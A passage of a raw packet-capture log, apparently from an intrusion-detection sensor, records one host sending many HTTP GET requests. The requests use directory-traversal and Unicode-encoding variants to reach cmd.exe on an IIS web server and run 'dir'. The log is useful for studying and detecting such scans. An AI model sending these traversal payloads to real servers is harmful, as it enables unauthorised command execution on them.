63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A  ction: close....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.714248 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4686 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:33319 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372D7F02  Ack: 0x91330E33  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.714252 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4687 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:33575 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D7EB3  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.716430 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4687 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:34599 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7EB4  Ack: 0xEE2555A7  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.716661 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x96
137.189.161.199:4687 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:34855 IpLen:20 DgmLen:136 DF
***AP*** Seq: 0x372D7EB4  Ack: 0xEE2555A7  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
32 35 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73  255c../winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63  tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48  +dir HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65  ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A  ction: close....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.722962 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4687 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:35111 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372D7F14  Ack: 0xEE2555A7  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.724504 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4691 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:35367 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D7EC5  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.726100 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4691 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:35623 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7EC6  Ack: 0xEE25A9D4  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.726334 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0xAB
137.189.161.199:4691 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:35879 IpLen:20 DgmLen:157 DF
***AP*** Seq: 0x372D7EC6  Ack: 0xEE25A9D4  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E  GET /_vti_bin/..
25 32 35 35 63 2E 2E 2F 2E 2E 25 32 35 35 63 2E  %255c../..%255c.
2E 2F 2E 2E 25 32 35 35 63 2E 2E 2F 77 69 6E 6E  ./..%255c../winn
74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65  t/system32/cmd.e
78 65 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F 31  xe?/c+dir HTTP/1
2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43  .0..Host: www..C
6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73  onnnection: clos
65 0D 0A 0D 0A                                   e....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.732158 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4691 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:36135 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372D7F3B  Ack: 0xEE25A9D4  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.733310 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4692 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:36391 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D7ED7  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.734986 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4692 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:36647 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7ED8  Ack: 0xEE27A38E  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.735303 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0xAB
137.189.161.199:4692 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:36903 IpLen:20 DgmLen:157 DF
***AP*** Seq: 0x372D7ED8  Ack: 0xEE27A38E  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 5F 6D 65 6D 5F 62 69 6E 2F 2E 2E  GET /_mem_bin/..
25 32 35 35 63 2E 2E 2F 2E 2E 25 32 35 35 63 2E  %255c../..%255c.
2E 2F 2E 2E 25 32 35 35 63 2E 2E 2F 77 69 6E 6E  ./..%255c../winn
74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65  t/system32/cmd.e
78 65 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F 31  xe?/c+dir HTTP/1
2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43  .0..Host: www..C
6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73  onnnection: clos
65 0D 0A 0D 0A                                   e....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.741281 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4692 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:37159 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372D7F4D  Ack: 0xEE27A38E  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.742377 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4693 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:37415 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D7EC9  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.743967 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4693 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:37671 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7ECA  Ack: 0xEE2991CA  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.744318 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0xC7
137.189.161.199:4693 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:37927 IpLen:20 DgmLen:185 DF
***AP*** Seq: 0x372D7ECA  Ack: 0xEE2991CA  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 32 35  GET /msadc/..%25
35 63 2E 2E 2F 2E 2E 25 32 35 35 63 2E 2E 2F 2E  5c../..%255c../.
2E 25 32 35 35 63 2F 2E 2E 25 63 31 25 31 63 2E  .%255c/..%c1%1c.
2E 2F 2E 2E 25 63 31 25 31 63 2E 2E 2F 2E 2E 25  ./..%c1%1c../..%
63 31 25 31 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79  c1%1c../winnt/sy
73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F  stem32/cmd.exe?/
63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A  c+dir HTTP/1.0..
48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E  Host: www..Connn
65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D  ection: close...
0A                                               .

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.752642 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4693 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:38183 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372D7F5B  Ack: 0xEE2991CA  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.753013 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4694 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:38439 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D7EE5  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.754932 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4694 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:38695 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7EE6  Ack: 0xEE2B56DE  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.755126 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x97
137.189.161.199:4694 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:38951 IpLen:20 DgmLen:137 DF
***AP*** Seq: 0x372D7EE6  Ack: 0xEE2B56DE  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
63 31 25 31 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79  c1%1c../winnt/sy
73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F  stem32/cmd.exe?/
63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A  c+dir HTTP/1.0..
48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E  Host: www..Connn
65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D  ection: close...
0A                                               .

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.815718 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4694 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:40999 IpLen:20 DgmLen:40
*****R** Seq: 0x372D7F47  Ack: 0x372D7F47  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.815721 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4694 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:41255 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372D7F47  Ack: 0x85088ED0  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.816050 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4695 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:41511 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D7F13  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.818010 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4695 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:41767 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7F14  Ack: 0xEE2D11F6  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.818220 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x97
137.189.161.199:4695 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:42023 IpLen:20 DgmLen:137 DF
***AP*** Seq: 0x372D7F14  Ack: 0xEE2D11F6  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
63 30 25 32 66 2E 2E 2F 77 69 6E 6E 74 2F 73 79  c0%2f../winnt/sy
73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F  stem32/cmd.exe?/
63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A  c+dir HTTP/1.0..
48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E  Host: www..Connn
65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D  ection: close...
0A                                               .

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.822931 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4695 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:42279 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372D7F75  Ack: 0xEE2D11F6  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.823254 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4695 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:42535 IpLen:20 DgmLen:40
*****R** Seq: 0x372D7F75  Ack: 0x372D7F75  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.824410 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4696 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:42791 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D7F23  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.826253 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4696 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:43559 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7F24  Ack: 0xEE2DB7E3  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.826556 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x97
137.189.161.199:4696 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:43815 IpLen:20 DgmLen:137 DF
***AP*** Seq: 0x372D7F24  Ack: 0xEE2DB7E3  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
63 30 25 61 66 2E 2E 2F 77 69 6E 6E 74 2F 73 79  c0%af../winnt/sy
73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F  stem32/cmd.exe?/
63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A  c+dir HTTP/1.0..
48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E  Host: www..Connn
65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D  ection: close...
0A                                               .

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.832102 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4696 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:44071 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7F85  Ack: 0xEE2DB9C5  Win: 0xAA1F  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.832305 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4696 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:44327 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372D7F85  Ack: 0xEE2DB9C5  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.833751 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4698 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:44583 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D7F27  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.835379 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4698 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:45351 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7F28  Ack: 0xEE2DE251  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.835825 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x97
137.189.161.199:4698 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:45607 IpLen:20 DgmLen:137 DF
***AP*** Seq: 0x372D7F28  Ack: 0xEE2DE251  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
63 31 25 39 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79  c1%9c../winnt/sy
73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F  stem32/cmd.exe?/
63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A  c+dir HTTP/1.0..
48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E  Host: www..Connn
65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D  ection: close...
0A                                               .

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.841319 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4698 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:45863 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7F89  Ack: 0xEE2DE433  Win: 0xAA1F  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.841608 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4698 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:46119 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372D7F89  Ack: 0xEE2DE433  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.842751 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4699 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:46375 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D7F1B  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.844389 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4699 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:46631 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7F1C  Ack: 0xEE2F74A7  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.844617 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x98
137.189.161.199:4699 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:46887 IpLen:20 DgmLen:138 DF
***AP*** Seq: 0x372D7F1C  Ack: 0xEE2F74A7  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
25 33 35 25 36 33 2E 2E 2F 77 69 6E 6E 74 2F 73  %35%63../winnt/s
79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F  ystem32/cmd.exe?
2F 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D  /c+dir HTTP/1.0.
0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E  .Host: www..Conn
6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A  nection: close..
0D 0A                                            ..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.847857 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4699 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:47143 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7F7E  Ack: 0xEE2F767B  Win: 0xAA2D  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.847865 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4699 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:47399 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372D7F7E  Ack: 0xEE2F767B  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.849644 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4700 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:47655 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D7F36  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.851270 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4700 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:47911 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7F37  Ack: 0xEE2FB2C0  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.851462 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x96
137.189.161.199:4700 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:48167 IpLen:20 DgmLen:136 DF
***AP*** Seq: 0x372D7F37  Ack: 0xEE2FB2C0  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
25 33 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73  %35c../winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63  tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48  +dir HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65  ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A  ction: close....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.854876 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4700 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:48423 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372D7F97  Ack: 0xEE2FB2C0  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:11.854878 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4700 -> 137.189.99.108:80 TCP TTL:125 TOS:0x0 ID:48679 IpLen:20 DgmLen:40
